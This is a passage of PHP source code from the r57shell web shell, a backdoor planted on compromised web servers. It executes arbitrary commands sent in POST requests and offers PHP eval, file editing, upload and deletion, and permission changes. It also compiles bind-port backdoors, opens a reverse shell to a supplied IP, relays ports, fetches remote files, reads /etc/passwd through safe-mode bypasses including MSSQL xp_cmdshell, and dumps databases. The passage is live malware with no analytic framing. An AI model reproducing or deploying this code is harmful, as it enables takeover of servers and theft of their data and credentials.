echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$ostype
:'.ws(1).'<br>server :'.ws(1).'<br>id :'.ws(1).'<br>pwd
:'.ws(1).'</b></font><br>';
echo "</td><td>";
echo "<font face=verdana size=-2 color=red><b>";
$uname = ex('uname -a');
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_una
me(),0,120)."<br>"));
if(!$safe_mode){
$bsd1 = ex('sysctl -n kern.ostype');
$bsd2 = ex('sysctl -n kern.osrelease');
$lin1 = ex('sysctl -n kernel.ostype');
$lin2 = ex('sysctl -n kernel.osrelease');
}
if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
else { $sysctl = "-"; }
echo ws(3).$sysctl."<br>";
echo ws(3).ex('echo $ostype')."<br>";
echo ws(3).@substr($server_software,0,120)."<br>";
$id = ex('id');
echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()."
uid=".@getmyuid()." gid=".@getmygid()."<br>"));
echo ws(3).$dir;
echo "</b></font>";
}
else
{
echo '<font color=blue><b>os :'.ws(1).'<br>server :'.ws(1).'<br>user
:'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
echo "</td><td>";
echo "<font face=verdana size=-2 color=red><b>";
echo ws(3).@substr(@php_uname(),0,120)."<br>";
echo ws(3).@substr($server_software,0,120)."<br>";
echo ws(3).@get_current_user()."<br>";
echo ws(3).$dir."<br>";
echo "</font>";
}
echo "</font>";
echo "</td></tr></table>";
if(empty($c1)||empty($c2)) { die(); }
$f = '<br>';
$f .= base64_decode($c1);
$f .= base64_decode($c2);
if(!empty($_post['cmd']) && $_post['cmd'] == "find_text")
{
$_post['cmd'] = 'find '.$_post['s_dir'].' -name \''.$_post['s_mask'].'\' | xargs
grep -e \''.$_post['s_text'].'\'';
}
if(!empty($_post['cmd']) && $_post['cmd']=="ch_")
{
switch($_post['what'])
{
case 'own':
@chown($_post['param1'],$_post['param2']);
break;
case 'grp':
@chgrp($_post['param1'],$_post['param2']);
break;
case 'mod':
@chmod($_post['param1'],intval($_post['param2'], 8));
break;
}
$_post['cmd']="";
}
if(!empty($_post['cmd']) && $_post['cmd']=="mk")
{
switch($_post['what'])
{
case 'file':
if($_post['action'] == "create")
{
if(file_exists($_post['mk_name']) || !$file=@fopen($_post['mk_name'],"w"))
{ echo ce($_post['mk_name']); $_post['cmd']=""; }
else {
fclose($file);
$_post['e_name'] = $_post['mk_name'];
$_post['cmd']="edit_file";
echo "<table width=100% cellpadding=0 cellspacing=0
bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=verdana
size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
}
}
else if($_post['action'] == "delete")
{
if(unlink($_post['mk_name'])) echo "<table width=100% cellpadding=0
cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font
face=verdana size=-
2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
$_post['cmd']="";
}
break;
case 'dir':
if($_post['action'] == "create"){
if(mkdir($_post['mk_name']))
{
$_post['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0
bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=verdana
size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
}
else { echo ce($_post['mk_name']); $_post['cmd']=""; }
}
else if($_post['action'] == "delete"){
if(rmdir($_post['mk_name'])) echo "<table width=100% cellpadding=0
cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font
face=verdana size=-
2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
$_post['cmd']="";
}
break;
}
}
if(!empty($_post['cmd']) && $_post['cmd']=="edit_file")
{
if(!$file=@fopen($_post['e_name'],"r+")) { $only_read = 1; @fclose($file); }
if(!$file=@fopen($_post['e_name'],"r")) { echo re($_post['e_name']);
$_post['cmd']=""; }
else {
echo $table_up3;
echo $font;
echo "<form name=save_file method=post>";
echo ws(3)."<b>".$_post['e_name']."</b>";
echo "<div align=center><textarea name=e_text cols=121 rows=24>";
echo @htmlspecialchars(@fread($file,@filesize($_post['e_name'])));
fclose($file);
echo "</textarea>";
echo "<input type=hidden name=e_name value=".$_post['e_name'].">";
echo "<input type=hidden name=dir value=".$dir.">";
echo "<input type=hidden name=cmd value=save_file>";
echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input
type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
echo "</div>";
echo "</font>";
echo "</form>";
echo "</td></tr></table>";
exit();
}
}
if(!empty($_post['cmd']) && $_post['cmd']=="save_file")
{
if(!$file=@fopen($_post['e_name'],"w")) { echo we($_post['e_name']); }
else {
@fwrite($file,$_post['e_text']);
@fclose($file);
$_post['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td
bgcolor=#cccccc><div align=center><font face=verdana size=-
2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
}
}
if (!empty($_post['port'])&&!empty($_post['bind_pass'])&&($_post['use']=="c"))
{
cf("/tmp/bd.c",$port_bind_bd_c);
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
@unlink("/tmp/bd.c");
$blah = ex("/tmp/bd ".$_post['port']." ".$_post['bind_pass']." &");
$_post['cmd']="ps -aux | grep bd";
}
if (!empty($_post['port'])&&!empty($_post['bind_pass'])&&($_post['use']=="perl"))
{
cf("/tmp/bdpl",$port_bind_bd_pl);
$p2=which("perl");
if(empty($p2)) $p2="perl";
$blah = ex($p2." /tmp/bdpl ".$_post['port']." &");
$_post['cmd']="ps -aux | grep bdpl";
}
if (!empty($_post['ip']) && !empty($_post['port']) && ($_post['use']=="perl"))
{
cf("/tmp/back",$back_connect);
$p2=which("perl");
if(empty($p2)) $p2="perl";
$blah = ex($p2." /tmp/back ".$_post['ip']." ".$_post['port']." &");
$_post['cmd']="echo \"now script try connect to ".$_post['ip']." port
".$_post['port']." ...\"";
}
if (!empty($_post['ip']) && !empty($_post['port']) && ($_post['use']=="c"))
{
cf("/tmp/back.c",$back_connect_c);
$blah = ex("gcc -o /tmp/backc /tmp/back.c");
@unlink("/tmp/back.c");
$blah = ex("/tmp/backc ".$_post['ip']." ".$_post['port']." &");
$_post['cmd']="echo \"now script try connect to ".$_post['ip']." port
".$_post['port']." ...\"";
}
if (!empty($_post['local_port']) && !empty($_post['remote_host']) && !
empty($_post['remote_port']) && ($_post['use']=="perl"))
{
cf("/tmp/dp",$datapipe_pl);
$p2=which("perl");
if(empty($p2)) $p2="perl";
$blah = ex($p2." /tmp/dp ".$_post['local_port']." ".$_post['remote_host']."
".$_post['remote_port']." &");
$_post['cmd']="ps -aux | grep dp";
}
if (!empty($_post['local_port']) && !empty($_post['remote_host']) && !
empty($_post['remote_port']) && ($_post['use']=="c"))
{
cf("/tmp/dpc.c",$datapipe_c);
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
@unlink("/tmp/dpc.c");
$blah = ex("/tmp/dpc ".$_post['local_port']." ".$_post['remote_port']."
".$_post['remote_host']." &");
$_post['cmd']="ps -aux | grep dpc";
}
if (!empty($_post['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if
($_post['alias'] == $alias_name){$_post['cmd']=$alias_cmd;}}}
if (!empty($http_post_files['userfile']['name']))
{
if(isset($_post['nf1']) && !empty($_post['new_name'])) { $nfn =
$_post['new_name']; }
else { $nfn = $http_post_files['userfile']['name']; }
@copy($http_post_files['userfile']['tmp_name'],
$_post['dir']."/".$nfn)
or print("<font color=red face=fixedsys><div align=center>error uploading
file ".$http_post_files['userfile']['name']."</div></font>");
}
if (!empty($_post['with']) && !empty($_post['rem_file']) && !
empty($_post['loc_file']))
{
switch($_post['with'])
{
case wget:
$_post['cmd'] = which('wget')." ".$_post['rem_file']." -o
".$_post['loc_file']."";
break;
case fetch:
$_post['cmd'] = which('fetch')." -p ".$_post['rem_file']." -o
".$_post['loc_file']."";
break;
case lynx:
$_post['cmd'] = which('lynx')." -source ".$_post['rem_file']." >
".$_post['loc_file']."";
break;
case links:
$_post['cmd'] = which('links')." -source ".$_post['rem_file']." >
".$_post['loc_file']."";
break;
case get:
$_post['cmd'] = which('get')." ".$_post['rem_file']." > ".$_post['loc_file']."";
break;
case curl:
$_post['cmd'] = which('curl')." ".$_post['rem_file']." -o
".$_post['loc_file']."";
break;
}
}
echo $table_up3;
if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?("dir"):("ls
-lia"); }
else if(empty($_post['cmd'])&&$safe_mode){ $_post['cmd']="safe_dir"; }
echo $font.$lang[$language.'_text1'].":
<b>".$_post['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea
name=report cols=121 rows=15>";
if($safe_mode)
{
switch($_post['cmd'])
{
case 'safe_dir':
$d=@dir($dir);
if ($d)
{
while (false!==($file=$d->read()))
{
if ($file=="." || $file=="..") continue;
@clearstatcache();
list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime,
$mtime, $ctime, $bsize) = stat($file);
if($windows){
echo date("d.m.y h:i",$mtime);
if(@is_dir($file)) echo " <dir> "; else printf("% 7s ",$size);
}
else{
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode." ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
echo date("d.m.y h:i ",$mtime);
}
echo "$file\n";
}
$d->close();
}
else echo $lang[$language._text29];
break;
case 'safe_file':
if(@is_file($_post['file']))
{
$file = @file($_post['file']);
if($file)
{
$c = @sizeof($file);
for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); }
}
else echo $lang[$language._text29];
}
else echo $lang[$language._text31];
break;
case 'test1':
$ci = @curl_init("file://".$_post['test1_file']."");
$cf = @curl_exec($ci);
echo $cf;
break;
case 'test2':
@include($_post['test2_file']);
break;
case 'test3':
if(!isset($_post['test3_port'])||empty($_post['test3_port']))
{ $_post['test3_port'] = "3306"; }
$db =
@mysql_connect('localhost:'.$_post['test3_port'],$_post['test3_ml'],$_post['test3_
mp']);
if($db)
{
if(@mysql_select_db($_post['test3_md'],$db))
{
$sql = "drop table if exists temp_r57_table;";
@mysql_query($sql);
$sql = "create table `temp_r57_table` ( `file` longblob not null );";
@mysql_query($sql);
$sql = "load data infile \"".$_post['test3_file']."\" into table
temp_r57_table;";
@mysql_query($sql);
$sql = "select * from temp_r57_table;";
$r = @mysql_query($sql);
while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]);
}
$sql = "drop table if exists temp_r57_table;";
@mysql_query($sql);
}
else echo "[-] error! can't select database";
@mysql_close($db);
}
else echo "[-] error! can't connect to mysql server";
break;
case 'test4':
if(!isset($_post['test4_port'])||empty($_post['test4_port']))
{ $_post['test4_port'] = "1433"; }
$db =
@mssql_connect('localhost,'.$_post['test4_port'],$_post['test4_ml'],$_post['test4_
mp']);
if($db)
{
if(@mssql_select_db($_post['test4_md'],$db))
{
@mssql_query("drop table r57_temp_table",$db);
@mssql_query("create table r57_temp_table ( string varchar (500) null)",$db);
@mssql_query("insert into r57_temp_table exec master.dbo.xp_cmdshell
'".$_post['test4_file']."'",$db);
$res = mssql_query("select * from r57_temp_table",$db);
while(($row=@mssql_fetch_row($res)))
{
echo $row[0]."\r\n";
}
@mssql_query("drop table r57_temp_table",$db);
}
else echo "[-] error! can't select database";
@mssql_close($db);
}
else echo "[-] error! can't connect to mssql server";
break;
}
}
else
if(($_post['cmd']!="php_eval")&&($_post['cmd']!="mysql_dump")&&($_post['cmd']!="db
_show")&&($_post['cmd']!="db_query")){
$cmd_rep = ex($_post['cmd']);
if($windows) { echo
@htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
else { echo @htmlspecialchars($cmd_rep)."\n"; }}
if ($_post['cmd']=="php_eval"){
$eval = @str_replace("<?","",$_post['php_eval']);
$eval = @str_replace("?>","",$eval);
@eval($eval);}
if ($_post['cmd']=="db_show")
{
switch($_post['db'])
{
case 'mysql':
if(empty($_post['db_port'])) { $_post['db_port'] = '3306'; }
$db =
@mysql_connect('localhost:'.$_post['db_port'],$_post['mysql_l'],$_post['mysql_p'])
;
if($db)
{
$res=@mysql_query("show databases", $db);
while(($row=@mysql_fetch_row($res)))
{
echo "[+] ".$row[0]."\r\n";
if(isset($_post['st'])){
$res2 = @mysql_query("show tables from ".$row[0],$db);
while(($row2=@mysql_fetch_row($res2)))
{
echo " | - ".$row2[0]."\r\n";
if(isset($_post['sc']))
{
$res3 = @mysql_query("show columns from ".$row[0].".".$row2[0],$db);
while(($row3=@mysql_fetch_row($res3))) { echo " | - ".$row3[0]."\r\n"; }
}
}
}
}
@mysql_close($db);
}
else echo "[-] error! can't connect to mysql server";
break;
case 'mssql':
if(empty($_post['db_port'])) { $_post['db_port'] = '1433'; }
$db =
@mssql_connect('localhost,'.$_post['db_port'],$_post['mysql_l'],$_post['mysql_p'])
;
if($db)
{
$res=@mssql_query("sp_databases", $db);
while(($row=@mssql_fetch_row($res)))
{
echo "[+] ".$row[0]."\r\n";
if(isset($_post['st'])){
@mssql_select_db($row[0]);
$res2 = @mssql_query("sp_tables",$db);
while(($row2=@mssql_fetch_array($res2)))
{
if($row2['table_type'] == 'table' && $row2['table_name'] != 'dtproperties')
{
echo " | - ".$row2['table_name']."\r\n";
if(isset($_post['sc']))
{
$res3 = @mssql_query("sp_columns ".$row2[2],$db);
while(($row3=@mssql_fetch_array($res3))) { echo " | -
".$row3['column_name']."\r\n"; }
}
}
}
}
}
@mssql_close($db);
}
else echo "[-] error! can't connect to mssql server";
break;
case 'postgresql':
if(empty($_post['db_port'])) { $_post['db_port'] = '5432'; }
$str = "host='localhost' port='".$_post['db_port']."'
user='".$_post['mysql_l']."' password='".$_post['mysql_p']."'
dbname='".$_post['mysql_db']."'";
$db = @pg_connect($str);
if($db)
{
$res=@pg_query($db,"select datname from pg_database where datistemplate='f'");
while(($row=@pg_fetch_row($res)))
{
echo "[+] ".$row[0]."\r\n";
}
@pg_close($db);
}
else echo "[-] error! can't connect to postgresql server";
break;
}
}
if ($_post['cmd']=="mysql_dump")
{
if(isset($_post['dif'])) { $fp = @fopen($_post['dif_name'], "w"); }
if((!empty($_post['dif'])&&$fp)||(empty($_post['dif']))){
$sqh = "# homepage: http://rst.void.ru\r\n";
$sqh .= "# ---------------------------------\r\n";
$sqh .= "# date : ".date ("j f y g:i")."\r\n";
$sqh .= "# database : ".$_post['mysql_db']."\r\n";
$sqh .= "# table : ".$_post['mysql_tbl']."\r\n";
$sqh .= "# ---------------------------------\r\n\r\n";
switch($_post['db']){
case 'mysql':
if(empty($_post['db_port'])) { $_post['db_port'] = '3306'; }
$db =
@mysql_connect('localhost:'.$_post['db_port'],$_post['mysql_l'],$_post['mysql_p'])
;
if($db)
{
if(@mysql_select_db($_post['mysql_db'],$db))
{
$sql1 = "# mysql dump created by r57shell\r\n";
$sql1 .= $sqh;
$res = @mysql_query("show create table `".$_post['mysql_tbl']."`", $db);
$row = @mysql_fetch_row($res);
$sql1 .= $row[1]."\r\n\r\n";
$sql1 .= "# ---------------------------------\r\n\r\n";
$sql2 = '';
$res = @mysql_query("select * from `".$_post['mysql_tbl']."`", $db);
if (@mysql_num_rows($res) > 0) {
while (($row = @mysql_fetch_assoc($res))) {
$keys = @implode("`, `", @array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
$values = @implode("', '", $values);
$sql2 .= "insert into `".$_post['mysql_tbl']."` (`".$keys."`) values
('".htmlspecialchars($values)."');\r\n";
}
$sql2 .= "\r\n# ---------------------------------";
}
if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
else { echo $sql1.$sql2; }
}
else echo "[-] error! can't select database";
@mysql_close($db);
}
else echo "[-] error! can't connect to mysql server";
break;
case 'mssql':
if(empty($_post['db_port'])) { $_post['db_port'] = '1433'; }
$db =
@mssql_connect('localhost,'.$_post['db_port'],$_post['mysql_l'],$_post['mysql_p'])
;
if($db)
{
if(@mssql_select_db($_post['mysql_db'],$db))
{
$sql1 = "# mssql dump created by r57shell\r\n";
$sql1 .= $sqh;
$sql2 = '';
$res = @mssql_query("select * from ".$_post['mysql_tbl']."", $db);
if (@mssql_num_rows($res) > 0) {
while (($row = @mssql_fetch_assoc($res))) {
$keys = @implode(", ", @array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
$values = @implode("', '", $values);
$sql2 .= "insert into ".$_post['mysql_tbl']." (".$keys.") values
('".htmlspecialchars($values)."');\r\n";
}
$sql2 .= "\r\n# ---------------------------------";
}
if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
else { echo $sql1.$sql2; }
}
else echo "[-] error! can't select database";
@mssql_close($db);
}
else echo "[-] error! can't connect to mssql server";
break;
case 'postgresql':
if(empty($_post['db_port'])) { $_post['db_port'] = '5432'; }
$str = "host='localhost' port='".$_post['db_port']."'
user='".$_post['mysql_l']."' password='".$_post['mysql_p']."'
dbname='".$_post['mysql_db']."'";
$db = @pg_connect($str);
if($db)
{
$sql1 = "# postgresql dump created by r57shell\r\n";
$sql1 .= $sqh;
$sql2 = '';
$res = @pg_query($db,"select * from ".$_post['mysql_tbl']."");
if (@pg_num_rows($res) > 0) {
while (($row = @pg_fetch_assoc($res))) {
$keys = @implode(", ", @array_keys($row));
$values = @array_values($row);
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
$values = @implode("', '", $values);
$sql2 .= "insert into ".$_post['mysql_tbl']." (".$keys.") values
('".htmlspecialchars($values)."');\r\n";
}
$sql2 .= "\r\n# ---------------------------------";
}
if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }
else { echo $sql1.$sql2; }
@pg_close($db);
}
else echo "[-] error! can't connect to postgresql server";
break;
}
}
else if(!empty($_post['dif'])&&!$fp) { echo "[-] error! can't write in dump
file"; }
}
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";
if(!$safe_mode){
echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
echo
sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4)
.in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.$table_end1.$fe;
}
else{
echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts;
echo
sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('h
idden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])
);
echo $te.$table_end1.$fe;
}
echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts;
echo
sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).i
n('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submi
t',0,$lang[$language.'_butt11']));
echo $te.$table_end1.$fe;
if($safe_mode){
echo $fs.$table_up1.$lang[$language.'_text57'].$table_up2.$ts;
echo
sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empt
y($_post['mk_name'])?($_post['mk_name']):("new_name"))).ws(4)."<select
name=action><option value=create>".$lang[$language.'_text65']."</option><option
value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select
name=what><option value=file>".$lang[$language.'_text59']."</option><option
value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'m
k').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1
3']));
echo $te.$table_end1.$fe;
}
if($safe_mode && $unix){
echo $fs.$table_up1.$lang[$language.'_text67'].$table_up2.$ts;
echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select
name=what><option value=mod>chmod</option><option value=own>chown</option><option
value=grp>chgrp</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."
</b>".ws(2).in('text','param1',40,(($_post['param1'])?($_post['param1']):("filenam
e"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2
title="'.$lang[$language.'_text71'].'"',26,(($_post['param2'])?($_post['param2']):
("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit',
'submit',0,$lang[$language.'_butt1']));
echo $te.$table_end1.$fe;
}
if(!$safe_mode){
foreach ($aliases as $alias_name=>$alias_cmd)
{
$aliases2 .= "<option>$alias_name</option>";
}
echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts;
echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select
name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','su
bmit',0,$lang[$language.'_butt1']));
echo $te.$table_end1.$fe;
}
echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts;
echo
sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text')
.ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo
sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)."
* ( /root;/home;/tmp )");
echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m
id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )
".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
echo $te.$table_end1.$fe;
echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts;
echo
sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text')
.ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
echo
sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)."
* ( /root;/home;/tmp )");
echo
sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]
').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','
dir',0,$dir));
echo $te.$table_end1.$fe;
echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font;
echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
echo (!empty($_post['php_eval'])?($_post['php_eval']):("/* delete script
*/\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
echo "</textarea>";
echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
echo "</font>";
echo $table_end1.$fe;
if($safe_mode&&$curl_on)
{
echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts;
echo
sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!e
mpty($_post['test1_file'])?($_post['test1_file']):("/etc/passwd"))).in('hidden','d
ir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$langu
age.'_butt8']));
echo $te.$table_end1.$fe;
}
if($safe_mode)
{
echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts;
echo "<table class=table1 width=100% align=center>";
echo
sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!e
mpty($_post['test2_file'])?($_post['test2_file']):("/etc/passwd"))).in('hidden','d
ir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$langu
age.'_butt8']));
echo $te.$table_end1.$fe;
}
if($safe_mode&&$mysql_on)
{
echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts;
echo
sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!emp
ty($_post['test3_md'])?($_post['test3_md']):("mysql"))).ws(4)."<b>".$lang[$languag
e.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_post['test3_ml'])?($_
post['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".
in('text','test3_mp',15,(!empty($_post['test3_mp'])?($_post['test3_mp']):("passwor
d"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',
15,(!empty($_post['test3_port'])?($_post['test3_port']):("3306"))));
echo
sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!e
mpty($_post['test3_file'])?($_post['test3_file']):("/etc/passwd"))).in('hidden','d
ir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$langu
age.'_butt8']));
echo $te.$table_end1.$fe;
}
if($safe_mode&&$mssql_on)
{
echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts;
echo
sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!emp
ty($_post['test4_md'])?($_post['test4_md']):("master"))).ws(4)."<b>".$lang[$langua
ge.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_post['test4_ml'])?($
_post['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".i
n('text','test4_mp',15,(!empty($_post['test4_mp'])?($_post['test4_mp']):("password
"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',1
5,(!empty($_post['test4_port'])?($_post['test4_port']):("1433"))));
echo
sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!em
pty($_post['test4_file'])?($_post['test4_file']):("dir"))).in('hidden','dir',0,$di
r).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_but
t8']));
echo $te.$table_end1.$fe;
}
if(@ini_get('file_uploads')){
echo "<form name=upload method=post enctype=multipart/form-data>";
echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts;
echo
sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1
id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('sub
mit','submit',0,$lang[$language.'_butt2']));
echo $te.$table_end1.$fe;
}
if(!$safe_mode&&!$windows){
echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts;
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\"
name=\"with\"><option value=\"wget\">wget</option><option
value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option
value=\"links\">links</option><option value=\"curl\">curl</option><option
value=\"get\">get</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$
language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
echo
sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir
).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
echo $te.$table_end1.$fe;
}
if($mysql_on||$mssql_on||$pg_on||$ora_on)
{
echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td
valign=top width=34%>".$ts;
echo "<font face=verdana size=-2><b><div
align=center>".$lang[$language.'_text77']."</div></b></font>";
echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select
name=db><option>mysql</option><option>mssql</option><option>postgresql</option></s
elect>");
echo
sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empt
y($_post['db_port'])?($_post['db_port']):("3306"))));
echo
sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empt
y($_post['mysql_l'])?($_post['mysql_l']):("root"))));
echo
sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empt
y($_post['mysql_p'])?($_post['mysql_p']):("password"))));
echo
sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in(
'hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc
id=sc',0,'1'));
echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=verdana size=-2><b><div
align=center>".$lang[$language.'_text40']."</div></b></font>";
echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select
name=db><option>mysql</option><option>mssql</option><option>postgresql</option></s
elect>");
echo
sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empt
y($_post['db_port'])?($_post['db_port']):("3306"))));
echo
sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empt
y($_post['mysql_l'])?($_post['mysql_l']):("root"))));
echo
sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empt
y($_post['mysql_p'])?($_post['mysql_p']):("password"))));
echo
sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!emp
ty($_post['mysql_db'])?($_post['mysql_db']):("mysql"))));
echo
sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!em
pty($_post['mysql_tbl'])?($_post['mysql_tbl']):("user"))));
echo
sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$lan
